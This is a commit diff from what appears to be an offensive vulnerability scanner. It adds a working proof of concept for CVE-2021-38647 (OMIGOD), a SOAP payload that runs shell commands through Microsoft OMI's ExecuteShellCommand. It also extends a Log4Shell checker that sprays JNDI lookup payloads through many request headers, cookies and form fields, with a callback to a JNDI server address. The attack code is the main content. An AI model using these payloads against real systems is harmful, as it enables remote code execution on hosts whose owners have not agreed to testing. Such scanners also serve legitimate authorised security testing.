up 2022-10-14

Author: hktalent

config/config.json

@@ -3,7 +3,7 @@
   "LimitReader": 819200,
   "OnClient": true,
   "ScanPoolSize":5000,
-  "JndiAddress": "https://rcejndi.51pwn.com",
+  "JndiAddress": "docker.for.mac.localhost:1389",
   "CeyeDomain": "scan4all.51pwn.com",
   "CacheName": ".DbCache",
   "autoRmCache": "true",

lib/util/util.go

@@ -79,8 +79,8 @@ func GetClient4Cc(szUrl string) *PipelineHttp.PipelineHttp {
 	InitCHcc()
 	oU, err := url.Parse(szUrl)
 	if nil == err {
-		// if o := clientHttpCc.Get(oU.Scheme + oU.Host); nil != o {
-		if o := clientHttpCc.Get("_ccClient"); nil != o && oU.Hostname() != "" {
+		if o := clientHttpCc.Get(oU.Host); nil != o {
+			//if o := clientHttpCc.Get("_ccClient"); nil != o && oU.Hostname() != "" {
 			if v, ok := o.Value().(*PipelineHttp.PipelineHttp); ok {
 				return v
 			}
@@ -126,8 +126,8 @@ func GetClient(szUrl string, pms ...map[string]interface{}) *PipelineHttp.Pipeli
 	//client.Client = G_hc
 	mUrls.Store(oU.Host, "")
 	clientHttpCc.Delete(oU.Scheme + oU.Host)
-	//clientHttpCc.Set(oU.Scheme+oU.Host, client, defaultInteractionDuration)
-	clientHttpCc.Set("_ccClient", client, defaultInteractionDuration)
+	clientHttpCc.Set(oU.Host, client, defaultInteractionDuration)
+	//clientHttpCc.Set("_ccClient", client, defaultInteractionDuration)
 
 	return client
 }

log4j.go

@@ -11,22 +11,22 @@ import (
 var config1 embed.FS
 
 // log4j 系列
-//  1、log4j盲大全套，包含struts2 根目录、二级目录
+//  1、log4j盲打全套，包含struts2 根目录、二级目录
 //  2、VCenter
 //  3、CheckTemenosT24
 //  4、Solr 上传jsp不会被解析
 //  5、struts2
 func main() {
 	util.DoInit(&config1)
-	szUrl := "http://127.0.0.1:9999/"
-	//if log4j.Check(szUrl, szUrl) {
-	//
-	//}
+	szUrl := "http://127.0.0.1:8080/"
+	if log4j.Check(szUrl, szUrl) {
+
+	}
 	//if log4j.VCenter(szUrl) {
 	//
 	//}
 	//log4j.CheckTemenosT24(szUrl)
-	log4j.Solr(szUrl)
+	//log4j.Solr(szUrl)
 	util.Wg.Wait()
 	util.CloseAll()
 }

pocs_go/CVE-2021-38647.go

@@ -0,0 +1,51 @@
+package pocs_go
+
+import (
+	"fmt"
+	"github.com/hktalent/ProScan4all/lib/util"
+	"io"
+	"regexp"
+	"strings"
+)
+
+var Payload = `<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema">
+   <s:Header>
+      <a:To>HTTP://192.168.1.1:5986/wsman/</a:To>
+      <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
+      <a:ReplyTo>
+         <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+      </a:ReplyTo>
+      <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand</a:Action>
+      <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
+      <a:MessageID>uuid:0AB58087-C2C3-0005-0000-000000010000</a:MessageID>
+      <w:OperationTimeout>PT1M30S</w:OperationTimeout>
+      <w:Locale xml:lang="en-us" s:mustUnderstand="false" />
+      <p:DataLocale xml:lang="en-us" s:mustUnderstand="false" />
+      <w:OptionSet s:mustUnderstand="true" />
+      <w:SelectorSet>
+         <w:Selector Name="__cimnamespace">root/scx</w:Selector>
+      </w:SelectorSet>
+   </s:Header>
+   <s:Body>
+      <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
+         <p:command>%s</p:command>
+         <p:timeout>0</p:timeout>
+      </p:ExecuteShellCommand_INPUT>
+   </s:Body>
+</s:Envelope>`
+
+var R001 = regexp.MustCompile(`<p:StdOut>(.*uid=.*)<\/p:StdOut>`)
+
+func DoCheckCVE202138647(szUrl string) bool {
+	if r1, err := util.DoPost(szUrl, map[string]string{
+		"User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
+		"Content-Type": "application/soap+xml;charset=UTF-8"}, strings.NewReader(fmt.Sprintf(Payload, "id"))); nil == err {
+		defer r1.Body.Close()
+		if data, err := io.ReadAll(r1.Body); nil == err {
+			if R001.MatchString(string(data)) {
+				return true
+			}
+		}
+	}
+	return false
+}

pocs_go/log4j/check.go

@@ -105,7 +105,7 @@ func VCenter(u string) bool {
 func Check(u string, finalURL string) bool {
 	if (util.CeyeApi != "" && util.CeyeDomain != "") || jndi.JndiAddress != "" {
 		var host = "null"
-		randomstr := util.RandomStr()
+		randomstr := "UpX34defineClass" //util.RandomStr()
 		if ux, err := url.Parse(strings.TrimSpace(u)); err == nil {
 			host = strings.Replace(ux.Host, ":", ".", -1)
 		}
@@ -117,7 +117,7 @@ func Check(u string, finalURL string) bool {
 			for _, payload := range log4jJndiPayloads {
 				var uri string
 				if jndi.JndiAddress != "" {
-					uri = jndi.JndiAddress + "/" + randomstr + "/"
+					uri = jndi.JndiAddress + "/" + randomstr
 				} else if util.CeyeApi != "" && util.CeyeDomain != "" {
 					uri = randomstr + "." + host + "." + util.CeyeDomain
 				}
@@ -126,6 +126,9 @@ func Check(u string, finalURL string) bool {
 				header := make(map[string]string)
 				header["Content-Type"] = "application/x-www-form-urlencoded"
 				header["User-Agent"] = payload
+				// docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
+				header["X-Api-Version"] = payload
+				//log.Println("payload", payload)
 				/* struts2 对静态文件 进行处理 If-Modified-Since，struts2默认静态文件
 				tooltip.gif
 				domtt.css
@@ -148,17 +151,21 @@ func Check(u string, finalURL string) bool {
 				header["Originating-IP"] = payload
 				header["X-Real-IP"] = payload
 				header["Forwarded"] = payload
-				// docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
-				header["X-Api-Version"] = payload
-
 				header["X-Wap-Profile"] = payload
 				header["Contact"] = payload
 				header["Forwarded"] = payload
 				header["X-Device"] = payload
 				header["Token"] = payload
 				header["Cookie"] = "JSESSIONID=" + payload
 				// 包含strus2 根目录
-				_, _ = util.HttpRequset(domain+"/"+payload, "GET", "", false, header)
+				_, err := util.HttpRequset(domain+"/"+payload, "GET", "", false, header)
+				if nil != err {
+					log.Println("POST", domain+"/"+payload, err)
+				}
+				_, err = util.HttpRequset(domain, "GET", "", false, header)
+				if nil != err {
+					log.Println("GET", domain, err)
+				}
 				_, _ = util.HttpRequset(finalURL, "POST", strings.Join(intputs, "="+payload+"&")+"="+payload, false, header)
 				_, _ = util.HttpRequset(domain, "POST", strings.Join(intputs, "="+payload+"&")+"="+payload, false, header)